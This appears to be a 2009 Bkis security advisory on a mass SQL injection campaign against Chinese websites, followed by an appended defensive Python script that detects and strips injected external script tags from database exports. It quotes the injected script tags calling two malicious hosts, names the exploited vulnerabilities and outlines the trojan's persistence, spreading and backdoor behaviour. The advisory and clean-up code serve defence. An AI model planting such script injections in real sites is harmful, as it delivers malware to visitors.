Bkis researchers have recently detected a new wave of massive SQL injection attacks. At the peak of the wave, according to Google search results, more than 187.000 websites were compromised.

Most of the infected websites are Chinese, including Chinese government websites under .gov.cn and educational websites under .edu.cn.

[Image: Google search results]

All of these websites have a SQL injection flaw, and their databases have been injected many times with the following code: <script src=hxxp://wgwggg.cn:1/1.js></script>

(Update on 17 Dec 2009: According to our latest analysis, hackers have injected new code into more than 178.000 websites, as follows: <script src=hxxp://a.118cc.cn></script>. You can see the Google search results here.)

[Image: View source of an infected website with malicious script]

When users visit these websites, the script executes and silently loads hidden iframes containing exploit code from malicious websites, which then download malware to the users' computers.

[Image: Malicious code in .js file]

[Image: Exploit tree]

The malicious websites use exploit code for the following vulnerabilities:

  • Integer overflow vulnerability in Adobe Flash Player, described in CVE-2007-0071
  • MDAC ADODB.Connection ActiveX vulnerability described in MS07-009
  • Microsoft Office Web Components vulnerabilities described in MS09-043
  • Microsoft video ActiveX vulnerability described in MS09-032
  • Internet Explorer Uninitialized Memory Corruption Vulnerability described in MS09-002.

A successful exploit silently downloads the file upload.css (detected by Bkav as W32.CSSExploit.Trojan) and installs it on the user's computer.

The virus W32.CSSExploit.Trojan has the following technical details:

  1. Drops the file %UserProfile%\[RandomName].drv
  2. Renames itself to "auto.exe" and copies itself to the %ProgramFiles%\Common Files\ folder
  3. Writes the registry key [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\auto]
  4. Registers the service DrvKiller to run the virus at Windows start-up.
  5. Copies an "autorun.inf" file and itself to all drives in order to spread.
  6. Changes the browser homepage to http://www.playbo[removed]ing.com.cn:8788/
  7. Installs a backdoor that allows the attacker to remotely control the computer.
  8. Downloads and executes many online game viruses and other malware on the infected computer.

According to the analysis, the virus and the wave of attacks are suspected to originate from China.

We are still tracking and making further analysis on this attack.

Recommendations for prevention:

  • Up to now, many websites remain unfixed. Administrators of these websites should quickly remove the malicious scripts injected into their databases and fix the websites' SQL injection flaws to prevent the next wave of attacks.
  • Users should install the latest Microsoft and Adobe patches.
  • Users should update their anti-virus software.
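As an added example (not Bkis's tooling and not code from the original post), the following Python script shows how a site administrator could locate and strip injected external <script> tags of the kind quoted above from text columns exported from a compromised database, covering both the injected payloads and the clean-up recommendation. The sample rows are constructed; the two hostnames are the defanged ones quoted in the post (hxxp standing in for http); the allow-list of hosts from which the site legitimately loads scripts is an assumption the administrator has to supply for their own site.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample rows standing in for the text columns of a compromised CMS
# database. Row ids, titles and bodies are made up; the two external hosts are
# the defanged ones quoted in the post (hxxp in place of http).
SAMPLE_ROWS: List[Dict[str, object]] = [
    {"id": 1, "title": "Welcome", "body": "Hello world"},
    {"id": 2, "title": "News<script src=hxxp://wgwggg.cn:1/1.js></script>", "body": "Latest news"},
    {"id": 3, "title": "About", "body": "About us<script src = hxxp://a.118cc.cn></script>"},
    {"id": 4, "title": "Contact", "body": 'Mail us<script src="/js/site.js"></script>'},
]

# A <script> tag whose src is an absolute URL. Whitespace around '=' and the
# quoting of the URL are optional, because the injected payloads vary in both.
# Relative src values (the site's own scripts) are deliberately not matched.
EXTERNAL_SCRIPT_RE = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*['\"]?\s*((?:hxxps?|https?)://[^'\"\s>]+)['\"]?[^>]*>"
    r"\s*(?:</script\s*>)?",
    re.IGNORECASE,
)


def host_of(url: str) -> str:
    """Return the lower-cased hostname of an absolute URL, without port or path."""
    rest = url.split("://", 1)[1]
    return rest.split("/", 1)[0].split(":", 1)[0].lower()


def find_injected_scripts(rows: Iterable[Dict[str, object]],
                          allowed_hosts: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Report every external <script> tag in a string column whose host is not
    on the site's own allow-list (allow-list assumed to be supplied by the admin)."""
    allowed = {h.lower() for h in allowed_hosts}
    findings: List[Dict[str, object]] = []
    for row in rows:
        for column, value in row.items():
            if not isinstance(value, str):
                continue
            for match in EXTERNAL_SCRIPT_RE.finditer(value):
                url = match.group(1)
                host = host_of(url)
                if host not in allowed:
                    findings.append({"id": row["id"], "column": column, "url": url, "host": host})
    return findings


def strip_injected_scripts(text: str, allowed_hosts: Iterable[str] = ()) -> str:
    """Remove external <script> tags not on the allow-list; all other text is kept verbatim."""
    allowed = {h.lower() for h in allowed_hosts}

    def keep_or_drop(match: "re.Match[str]") -> str:
        return match.group(0) if host_of(match.group(1)) in allowed else ""

    return EXTERNAL_SCRIPT_RE.sub(keep_or_drop, text)


def clean_rows(rows: Iterable[Dict[str, object]],
               allowed_hosts: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Return a cleaned copy of the rows; the originals are left untouched so the
    infected export can be kept as evidence."""
    cleaned: List[Dict[str, object]] = []
    for row in rows:
        cleaned.append({
            key: strip_injected_scripts(value, allowed_hosts) if isinstance(value, str) else value
            for key, value in row.items()
        })
    return cleaned


if __name__ == "__main__":
    for finding in find_injected_scripts(SAMPLE_ROWS):
        print(f"row {finding['id']} column {finding['column']}: "
              f"external script from {finding['host']} ({finding['url']})")
    for row in clean_rows(SAMPLE_ROWS):
        print(row)
```

Run against a real export, the report should be reviewed before the cleaned rows are written back, and the untouched export kept for the investigation. Stripping the tags only removes the payload; as the recommendation above says, the SQL injection flaw itself still has to be fixed, otherwise the next wave simply re-injects the database.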

Bkis
